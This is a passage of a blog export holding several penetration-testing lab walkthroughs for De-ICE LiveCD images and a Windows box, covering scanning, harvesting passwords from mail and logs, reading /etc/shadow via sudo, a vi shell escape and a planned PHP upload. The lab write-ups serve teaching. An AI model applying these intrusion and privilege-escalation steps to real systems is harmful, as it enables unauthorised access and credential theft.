<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzL5sCyEqGehiQSUCNUD9D7EepBWdv_viYfS445_LIZTn9r9fVI_sxLpfr0Ulaq_xsvvai4h4AJcWr-5XHLXBWoG7sWHLX3Oa0XZgsqLkka-9AeNBI4OKJaeFZjnOuARp8ByPZtbp8GSg/s1600/scream.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzL5sCyEqGehiQSUCNUD9D7EepBWdv_viYfS445_LIZTn9r9fVI_sxLpfr0Ulaq_xsvvai4h4AJcWr-5XHLXBWoG7sWHLX3Oa0XZgsqLkka-9AeNBI4OKJaeFZjnOuARp8ByPZtbp8GSg/s1600/scream.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Wow! So beautiful! I run dirb, but it didn't find any website... So, we have to focus on FTP.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwwa8sqM9mbQxgR0YtUafbLiaMFc7L6I9QWV2a2UBSCDB1uLDni613OSAbcKqIKo_WdXUv3M51feJbu6aRdTomN_RKupZUQ_hoya9kCwYk3cjom-5YeH0P64Y4StIjEM9fhAoqPnWdNuY/s1600/ftp.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwwa8sqM9mbQxgR0YtUafbLiaMFc7L6I9QWV2a2UBSCDB1uLDni613OSAbcKqIKo_WdXUv3M51feJbu6aRdTomN_RKupZUQ_hoya9kCwYk3cjom-5YeH0P64Y4StIjEM9fhAoqPnWdNuY/s1600/ftp.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
OK, we know that pages are in the root directory, so mayve we will be able to upload our reverse shell script? Unfortunately anonymous user does not have enough privileges for each directory.<br />
I was trying also use Metasploit exploits but without success... Let's try play with SSH.<br />
BINGO! We can use <b>freesshd_authbypass </b> exploit and we will get SYSTEM privileges (it is equal to <b>root</b> from Unix distribution).<br />
Game Over!<br />
<br />
<br />
<br />rgolebiowskihttp://www.blogger.com/profile/06575754454762912759noreply@blogger.comtag:blogger.com,1999:blog-3159890562902717913.post-18023888572887298872016-07-18T14:32:00.000+02:002016-07-21T15:23:09.921+02:00De-Ice 2.100Hello,<br />
<br />
Scenario<br />
"The scenario for this LiveCD is that you have been given an assignment to test a company's 192.168.2.xxx network to identify any vulnerabilities or exploits. The systems within this network are not critical systems and recent backups have been created and tested, so any damage you might cause is of little concern. The organization has had multiple system administrators manage the network over the last couple of years, and they are unsure of the competency previous (or current) staff2"<br />
<br />
Scanning<br />
<blockquote class="tr_bq">
PORT STATE SERVICE VERSION<br />
<b>20/tcp closed ftp-data<br />21/tcp open ftp vsftpd 2.0.4</b><br />
| ftp-anon: Anonymous FTP login allowed (FTP code 230)<br />
|_Can't get directory listing: TIMEOUT<br />
<b>22/tcp open ssh OpenSSH 4.3 (protocol 1.99)</b><br />
| ssh-hostkey: <br />
| 2048 83:4f:8b:e9:ea:84:20:0d:3d:11:2b:f0:90:ca:79:1c (RSA1)<br />
| 2048 6f:db:a5:12:68:cd:ad:a9:9c:cd:1e:7b:97:1a:4c:9f (DSA)<br />
|_ 2048 ab:ab:a8:ad:a2:f2:fd:c2:6f:05:99:69:40:54:ec:10 (RSA)<br />
|_sshv1: Server supports SSHv1<br />
<b>25/tcp open smtp?</b><br />
|_smtp-commands: Couldn't establish connection on port 25<br />
<b>80/tcp open http Apache httpd 2.0.55 ((Unix) PHP/5.1.2)</b><br />
|_http-server-header: Apache/2.0.55 (Unix) PHP/5.1.2<br />
|_http-title: Site doesn't have a title (text/html).<br />
<b>110/tcp open pop3 Openwall popa3d<br />143/tcp open imap UW imapd 2004.357</b><br />
|_imap-capabilities: IDLE IMAP4REV1 BINARY THREAD=REFERENCES SORT completed SCAN CAPABILITY OK MULTIAPPEND THREAD=ORDEREDSUBJECT STARTTLS MAILBOX-REFERRALS AUTH=LOGINA0001 LITERAL+ SASL-IR UNSELECT NAMESPACE LOGIN-REFERRALS<br />
|_imap-ntlm-info: ERROR: Script execution failed (use -d to debug)<br />
<b>443/tcp closed https</b></blockquote>
I tried log in as anonymous to FTP service, but without success. I have got indeed response 230 but I can't list directory. Probably we need to user with higher privileges.<br />
<br />
Default web page looks as below<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwsUeYltOgSKJyr_ZdLULvDhPkoRH2XxrhootSeDWyB10hzglx7Co2CJ5uk5AMts0att4xZ2wlXUV2i3uvSGZDQSh6MI9bOjukiTbCrt2C_wizrGCM_Vv9wGru0zTcq74VzkmOMHWqbQU/s1600/web.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="483" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwsUeYltOgSKJyr_ZdLULvDhPkoRH2XxrhootSeDWyB10hzglx7Co2CJ5uk5AMts0att4xZ2wlXUV2i3uvSGZDQSh6MI9bOjukiTbCrt2C_wizrGCM_Vv9wGru0zTcq74VzkmOMHWqbQU/s640/web.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Nice web page. So, we can see three links but in spite of that let's run dirbuster.<br />
In the meantime I clicked on link <b>CLICK HERE</b> and I have got something interesting!<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6sF1Fj0fA05H3n_HeE-ERG4ig2edAoqA8YWtAliQRMxhGFv4ij3Mgvv8yuQaDZhXRQ6eAddI8yTryimyQA3dnL4t847bxAx9TU877z_F54grr7X5uIYb1TgKtUhpcxEFgGbFoCRIbPsY/s1600/usernames.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6sF1Fj0fA05H3n_HeE-ERG4ig2edAoqA8YWtAliQRMxhGFv4ij3Mgvv8yuQaDZhXRQ6eAddI8yTryimyQA3dnL4t847bxAx9TU877z_F54grr7X5uIYb1TgKtUhpcxEFgGbFoCRIbPsY/s640/usernames.png" width="570" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Great! There is a list of usernames, I think.<br />
Dirbuster gave us result<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjj7ErSqyxsfp52eyLgFEchIiZn5XPlBlsYo75kkQ1IwVeuhCy4pD6fp-Ib-pvH5PGEgJJoatvg-O9qqPVprW77XlY6SlEyQBpU6WA3SH_qXQZmPKtNt_DHtlSdhvedsE4wh593JsTT7NM/s1600/dirbuster.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjj7ErSqyxsfp52eyLgFEchIiZn5XPlBlsYo75kkQ1IwVeuhCy4pD6fp-Ib-pvH5PGEgJJoatvg-O9qqPVprW77XlY6SlEyQBpU6WA3SH_qXQZmPKtNt_DHtlSdhvedsE4wh593JsTT7NM/s1600/dirbuster.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
OK, there is not much files. I have created list of usernames and I was trying brute-force FTP and SSH, but without success. I have no idea how to attack this machine. So, maybe we need to a little bit more enumeration.<br />
<blockquote class="tr_bq">
Nmap scan report for 192.168.2.100<br />
Host is up (0.00016s latency).<br />
MAC Address: 08:00:27:53:0C:11 (Oracle VirtualBox virtual NIC)<br />
Nmap scan report for 192.168.2.101<br />
Host is up (0.00016s latency).<br />
MAC Address: 08:00:27:53:0C:11 (Oracle VirtualBox virtual NIC)<br />
Nmap scan report for 192.168.2.1</blockquote>
So, 192.168.2.100 is our target, 192.168.2.1 is our attacker machine, but what is 192.168.2.101?<br />
<blockquote class="tr_bq">
PORT STATE SERVICE VERSION<br />
80/tcp open http Apache httpd 2.0.55 ((Unix) PHP/5.1.2)<br />
| http-methods: <br />
|_ Potentially risky methods: TRACE<br />
|_http-server-header: Apache/2.0.55 (Unix) PHP/5.1.2<br />
|_http-title: Site doesn't have a title (text/html).</blockquote>
Wow, what is that?<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgkvKN1fjnv0B2rBvaFv267feroextyfYn0K_ttkAFzae9JKESFwMQVpxg_ltNnZJVxQyutiNgxFzJHCye8QbVW2ZRmBLvhBoF8BUg9FvK3uTBuqTlchvN0CCT24BF_wkJ4-Fot4wyKAI/s1600/security.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="164" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgkvKN1fjnv0B2rBvaFv267feroextyfYn0K_ttkAFzae9JKESFwMQVpxg_ltNnZJVxQyutiNgxFzJHCye8QbVW2ZRmBLvhBoF8BUg9FvK3uTBuqTlchvN0CCT24BF_wkJ4-Fot4wyKAI/s640/security.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
I run Dirbuster and <b>/home/root</b> directory has been found! So maybe there is other user's home directory? BINGO! We found private and public key for SSH.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhR8ZhP4D1V8IB2YlBcXj_52weQft8fCwQ8uyKCPbaf6ZkiixgPuH6VLjqSB0ualLh5_jDN6EEsQSPnRJTcJ6l-PqIFSZTIpNu6shJaxb4n9d5_SG10r-NT47vGEEKPGsrAVCpRG6EwYT8/s1600/home.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhR8ZhP4D1V8IB2YlBcXj_52weQft8fCwQ8uyKCPbaf6ZkiixgPuH6VLjqSB0ualLh5_jDN6EEsQSPnRJTcJ6l-PqIFSZTIpNu6shJaxb4n9d5_SG10r-NT47vGEEKPGsrAVCpRG6EwYT8/s1600/home.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Interesting... So, I have downloaded private key and I used it to log in as pirrip.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7vNZ97uJfj_0vphRHXw-eL6DK8YvLSsM-GFCX6Qkg7IodIDbfgxaWx_ofcilBJXMI7rxyWW51n6kKZ-ldBxPd02uDQUvD_YiX1oMu6gQ3kM8cvlZj1DfowlZhTTJRBqgS33JTnrlwWk8/s1600/ssh.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7vNZ97uJfj_0vphRHXw-eL6DK8YvLSsM-GFCX6Qkg7IodIDbfgxaWx_ofcilBJXMI7rxyWW51n6kKZ-ldBxPd02uDQUvD_YiX1oMu6gQ3kM8cvlZj1DfowlZhTTJRBqgS33JTnrlwWk8/s1600/ssh.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
I have found something interesting in the <b>/var/mail</b> directory.<br />
<blockquote class="tr_bq">
pirrip@slax:/var/mail$ ls<br />havisham magwitch pirrip</blockquote>
So, let's check what kind of information these mails have. Our user has very juicy information.<br />
<blockquote class="tr_bq">
From: Estella Havisham <havisham@slax.example.net><br />Message-Id: <200801132350.m0DNoXfV010468@slax.example.net><br />Date: Sun, 13 Jan 2008 23:50:33 +0000<br />To: pirrip@slax.example.net<br />Subject: welcome to the team<br />User-Agent: nail 11.25 7/29/05<br />MIME-Version: 1.0<br />Content-Type: text/plain; charset=us-ascii<br />Content-Transfer-Encoding: 7bit<br /><br />Thanks! Glad to be here.<br /><br />From magwitch@slax.example.net Sun Jan 13 23:53:37 2008<br />Return-Path: <magwitch@slax.example.net><br />Received: from slax.example.net (localhost [127.0.0.1])<br /> by slax.example.net (8.13.7/8.13.7) with ESMTP id m0DNmvpV009983<br /> for <pirrip@slax.example.net>; Sun, 13 Jan 2008 23:48:57 GMT<br />Received: (from magwitch@localhost)<br /> by slax.example.net (8.13.7/8.13.7/Submit) id m0DNmvpd009982<br /> for pirrip; Sun, 13 Jan 2008 23:48:57 GMT<br />From: Abel Magwitch <magwitch@slax.example.net><br />Message-Id: <200801132348.m0DNmvpd009982@slax.example.net><br />Date: Sun, 13 Jan 2008 23:48:57 +0000<br />To: pirrip@slax.example.net<br />Subject: havisham<br />User-Agent: nail 11.25 7/29/05<br />MIME-Version: 1.0<br />Content-Type: text/plain; charset=us-ascii<br />Content-Transfer-Encoding: 7bit<br /><br />I set her up with an accountus servers. I set her password to "<b>changeme</b>" and will swing by tomorrow and make sure she changes her pw.</blockquote>
Let's try log in as <b>havisham</b> using this password. Hmmm it does not work... but wait a minute<br />
<blockquote class="tr_bq">
From: noreply@fermion.herot.net<br />Message-Id: <200801132354.m0DNshjD011722@slax.example.net><br />Date: Sun, 13 Jan 2008 23:54:42 +0000<br />To: pirrip@slax.example.net<br />Subject: Fermion Account Login Reminder<br />User-Agent: nail 11.25 7/29/05<br />MIME-Version: 1.0<br />Content-Type: text/plain; charset=us-ascii<br />Content-Transfer-Encoding: 7bit<br /><br />Fermion Account Login Reminder<br /><br />Listed below are your Fermion Account login credentials. Please let us know if you have any questions or problems.<br /><br />Regards,<br />Fermion Support<br /><br /><br />E-Mail: pirrip@slax.example.net<br />Password: 0l1v3rTw1st</blockquote>
Wow, now we know our password! So let's check what we can do as root.<br />
<blockquote class="tr_bq">
pirrip@slax:/var/mail$ sudo -l<br />User pirrip may run the following commands on this host:<br /> (root) /usr/bin/more<br /> (root) /usr/bin/tail<br /> (root) /usr/bin/vi<br /> (root) /usr/bin/cat ALL</blockquote>
Excellent! I have used more command toward /etc/shadow<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuNaJzH-68QmxOozSX8XDStsILpoSKnEQxtxccFToVPtkHPPjXXUFY2oJTeNX8MFk0iMVftPR4x4T_oJqj0v9LdtIW3ibE7pPaFGhMUWEqwlF90PE2iMeuGDhP6rXP5bmfpOhwEYBf6ag/s1600/more.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuNaJzH-68QmxOozSX8XDStsILpoSKnEQxtxccFToVPtkHPPjXXUFY2oJTeNX8MFk0iMVftPR4x4T_oJqj0v9LdtIW3ibE7pPaFGhMUWEqwlF90PE2iMeuGDhP6rXP5bmfpOhwEYBf6ag/s1600/more.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />So, we are able to use John the Ripper. Unfortunately it consumes a lot of time... We know that <b>vi</b> can use another command via <b>!command</b>.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjeGLUiKDATqmoJqKX_4dxZ3qsx9Rzv6sF-1LwiZMZxxe6zlmR0sMXN1NOwLFbHJwNTrQg3i9-oJNlrRYloDhjhrKLds7n1SPYyhUH2XT2jl4xmv6zenaiyx-ByNed5n5j9M6IfFc__bxo/s1600/shadow.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="483" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjeGLUiKDATqmoJqKX_4dxZ3qsx9Rzv6sF-1LwiZMZxxe6zlmR0sMXN1NOwLFbHJwNTrQg3i9-oJNlrRYloDhjhrKLds7n1SPYyhUH2XT2jl4xmv6zenaiyx-ByNed5n5j9M6IfFc__bxo/s640/shadow.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Game over!<br />
<br />rgolebiowskihttp://www.blogger.com/profile/06575754454762912759noreply@blogger.comtag:blogger.com,1999:blog-3159890562902717913.post-1729407593541794662016-07-15T11:42:00.001+02:002016-07-18T08:48:43.673+02:00De-ICE: S1.140Hello,<br />
De-ICE are Penetration LiveCD images available from http://forum.heorot.net and provide scenarios where students can test their penetration testing skills and tools in a legal environment.<br />
<br />
Scanning with aggressive mode all ports<br />
<blockquote class="tr_bq">
<br />
PORT STATE SERVICE VERSION<br />
<b>21/tcp open ftp ProFTPD 1.3.4a</b><br />
| ftp-anon: Anonymous FTP login allowed (FTP code 230)<br />
|_Can't get directory listing: ERROR<br />
<b>22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)</b><br />
| ssh-hostkey: <br />
| 1024 38:82:58:d3:9c:0d:28:01:f0:77:11:0a:24:c7:28:84 (DSA)<br />
| 2048 62:a6:24:6a:62:71:b6:5f:7f:67:2f:c2:fd:0a:2a:5e (RSA)<br />
|_ 256 2b:1d:91:ac:6b:2e:7a:fe:6e:aa:0d:55:cc:30:7c:de (ECDSA)<br />
<b>80/tcp open http Apache httpd 2.2.22 ((Ubuntu) mod_ssl/2.2.22 OpenSSL/1.0.1)</b><br />
|_http-server-header: Apache/2.2.22 (Ubuntu) mod_ssl/2.2.22 OpenSSL/1.0.1<br />
|_http-title: Lazy Admin Corp.<br />
<b>443/tcp open ssl/http Apache httpd 2.2.22 ((Ubuntu) mod_ssl/2.2.22 OpenSSL/1.0.1)</b><br />
|_http-server-header: Apache/2.2.22 (Ubuntu) mod_ssl/2.2.22 OpenSSL/1.0.1<br />
|_http-title: Lazy Admin Corp.<br />
| ssl-cert: Subject: commonName=webhost<br />
| Not valid before: 2016-07-13T09:13:52<br />
|_Not valid after: 2026-07-11T09:13:52<br />
|_ssl-date: 2016-07-13T09:17:17+00:00; -1s from scanner time.<br />
<b>465/tcp closed smtps<br />993/tcp open ssl/imap Dovecot imapd</b><br />
|_imap-capabilities: LOGIN-REFERRALS ENABLE AUTH=PLAIN Pre-login have ID IMAP4rev1 listed more capabilities post-login IDLE AUTH=LOGINA0001 OK SASL-IR LITERAL+<br />
|_ssl-date: 2016-07-13T09:17:17+00:00; -1s from scanner time.<br />
<b>995/tcp open ssl/pop3 Dovecot pop3d</b><br />
|_pop3-capabilities: SASL(PLAIN LOGIN) RESP-CODES PIPELINING CAPA TOP UIDL USER<br />
|_ssl-date: 2016-07-13T09:17:17+00:00; -1s from scanner time.</blockquote>
Let's start from FTP, because it allows anonymous user. There is <b>incoming</b> directory which is empty.<br />
Browsing web application we can see default web page<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXrQxvQLOiHwxCQOEI0obYtC38WdDS315yJKJHjqhSMkAK9yfa-3uGwzyXQ-oTfPy3z5i-0orETj5Eb4IZoJjlk8BYuSO1xKavW2WpegqMX3FAgauH-lf1aIHZTuwvyczOuKtiNojMzqg/s1600/admin.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="322" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXrQxvQLOiHwxCQOEI0obYtC38WdDS315yJKJHjqhSMkAK9yfa-3uGwzyXQ-oTfPy3z5i-0orETj5Eb4IZoJjlk8BYuSO1xKavW2WpegqMX3FAgauH-lf1aIHZTuwvyczOuKtiNojMzqg/s640/admin.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
OK, we won't to display a source code, because it contains hints. Let's run Dirbuster.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFnaSCg68Lr-VxVB2PtF6QB4F8VrikATQBvORAiEUz6Guly1uU3F20pvur5H8SXdrrw_LSi2wIobeOum794_DUkGqaIG9dHcyZ-b0zYCtWWOia97dzBYJuaPMVjk5kVRUszq2KQZ59_8o/s1600/dirbuster.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFnaSCg68Lr-VxVB2PtF6QB4F8VrikATQBvORAiEUz6Guly1uU3F20pvur5H8SXdrrw_LSi2wIobeOum794_DUkGqaIG9dHcyZ-b0zYCtWWOia97dzBYJuaPMVjk5kVRUszq2KQZ59_8o/s1600/dirbuster.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Forum looks interesting. Let's see it deeper.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNIOxigVpAEi7HqbtUz8gH7hNHL5i16bcJ6wJFqHMe0KYZvLYQyXpFSyJK2fGF-vNSy_wzzuHTgDdht4H6v2-V_S0XV75PO1Y47Mnrwx9R7OvoBEReNK1Gvn9W7mdD7KEBs2udJp5PYco/s1600/forum.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNIOxigVpAEi7HqbtUz8gH7hNHL5i16bcJ6wJFqHMe0KYZvLYQyXpFSyJK2fGF-vNSy_wzzuHTgDdht4H6v2-V_S0XV75PO1Y47Mnrwx9R7OvoBEReNK1Gvn9W7mdD7KEBs2udJp5PYco/s1600/forum.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Excellent! Hmmm what do you think about <b>Login Attacks</b>? It is interesting for you? Beucase for me it is.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigBDkjo2yji5mercE6EB7rIKZbpZylnGmQT2FFQH81lrip2ZxbLqxgE0PtgpH8-wW4ipxpj0X3wHo3_S5UiAo9kZOBLGtASi4hUC3UFpzkWm0PJGld6_Zfh2x9Z7zmPHf7hAIOWb2OFZs/s1600/ssh.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigBDkjo2yji5mercE6EB7rIKZbpZylnGmQT2FFQH81lrip2ZxbLqxgE0PtgpH8-wW4ipxpj0X3wHo3_S5UiAo9kZOBLGtASi4hUC3UFpzkWm0PJGld6_Zfh2x9Z7zmPHf7hAIOWb2OFZs/s1600/ssh.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
OK, we have to understand what it was going on. We can see that someone was trying enumerate usernames and/or brute force SSH. Hey, look at this<br />
<blockquote class="tr_bq">
Mar 7 11:15:32 testbox sshd[5774]: Accepted keyboard-interactive/pam for <b>mbrown</b> from 10.0.0.23 port 35168 ssh2<br />
Mar 7 11:15:32 testbox sshd[5774]: pam_unix(sshd:session): session opened for user mbrown by (uid=0)</blockquote>
but unfortunately SSH in this case does not allow password authentication.<br />
I have also found<br />
<blockquote class="tr_bq">
Mar 7 11:15:32 testbox sshd[5772]: Invalid user <b>!DFiuoTkbxtdk0!</b> from 10.0.0.23<br />
Mar 7 11:15:32 testbox sshd[5772]: input_userauth_request: invalid user <b>!DFiuoTkbxtdk0!</b> [preauth]</blockquote>
This looks like a password. BINGO! I have logged in as <b>mbrown</b> using the password. <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxZuq3d56SnblXw45zkPlwqvhgr-Ovkb00EJRbfRhaGtgVI3ZhpVYa2XnEec9btyuinKqYM-e10Uig3UbMRxJFGQli3sJTQFonEqSk_eFMiA-grTsOteKFEnt6eDoRS96xfRxrpTpoWeo/s1600/user.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="634" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxZuq3d56SnblXw45zkPlwqvhgr-Ovkb00EJRbfRhaGtgVI3ZhpVYa2XnEec9btyuinKqYM-e10Uig3UbMRxJFGQli3sJTQFonEqSk_eFMiA-grTsOteKFEnt6eDoRS96xfRxrpTpoWeo/s640/user.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Very good! I was looking for some chance to upload some kind of backdoor, but without success.<br />
I remember that DirBuster found also <b>/webmail/</b> directory, so let's try to log in as mbrown.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQ0m_seDtphGEaNJNRdTcg5s1Sl2hCC3Djm4CL3WlVt3DbXnJoOeui18X1KNlpcpBhy0JAfYNp4YJS08LMbNYKpioQk6cG3h8g1BVvJuiRE4f81Ugxd2LLcQbXwgNrI2wgp4ProbbnVQM/s1600/webmail.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQ0m_seDtphGEaNJNRdTcg5s1Sl2hCC3Djm4CL3WlVt3DbXnJoOeui18X1KNlpcpBhy0JAfYNp4YJS08LMbNYKpioQk6cG3h8g1BVvJuiRE4f81Ugxd2LLcQbXwgNrI2wgp4ProbbnVQM/s1600/webmail.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
BINGO! We are in. I have open one of two mail and it contains following very juicy information.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuULoZI7UHJf2m_57VJdV99nf3X48EJ1Ujt3s-Rh0z8gZ5_vK3i4E6rzIDEEsGJ6ABZ9y8NFU4MTaaseK_71eiCWeEjeAiI_a2nBnCLDoLZ6L7JBy1S8e9jz_tZXFRJhR-nJonPyvF8pY/s1600/mail.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuULoZI7UHJf2m_57VJdV99nf3X48EJ1Ujt3s-Rh0z8gZ5_vK3i4E6rzIDEEsGJ6ABZ9y8NFU4MTaaseK_71eiCWeEjeAiI_a2nBnCLDoLZ6L7JBy1S8e9jz_tZXFRJhR-nJonPyvF8pY/s1600/mail.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Wow! So nice! Now we are able to log in as <b>root</b> to <b>phpmyadmin</b> panel.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYHJSW3dd3v86OiiLSqr7Llx_TnWN3UDAfNec8ZoRauv0x3HLj891SmtPUApOv1MdYxL-Om34Q0RuRElRslI4vvyvXa0gqTW2UE_WXZMrl3tnVtJzbZth2YXwMU9PoFltwAXPYiyxzeNc/s1600/phpmyadmin.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYHJSW3dd3v86OiiLSqr7Llx_TnWN3UDAfNec8ZoRauv0x3HLj891SmtPUApOv1MdYxL-Om34Q0RuRElRslI4vvyvXa0gqTW2UE_WXZMrl3tnVtJzbZth2YXwMU9PoFltwAXPYiyxzeNc/s1600/phpmyadmin.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Nice! I was searching a lot 'where may I upload our PHP script' and I have found that <b>/templates_c/</b> directory is writable.<br />
<div class="separator" style="clear: both; text-align: center;">
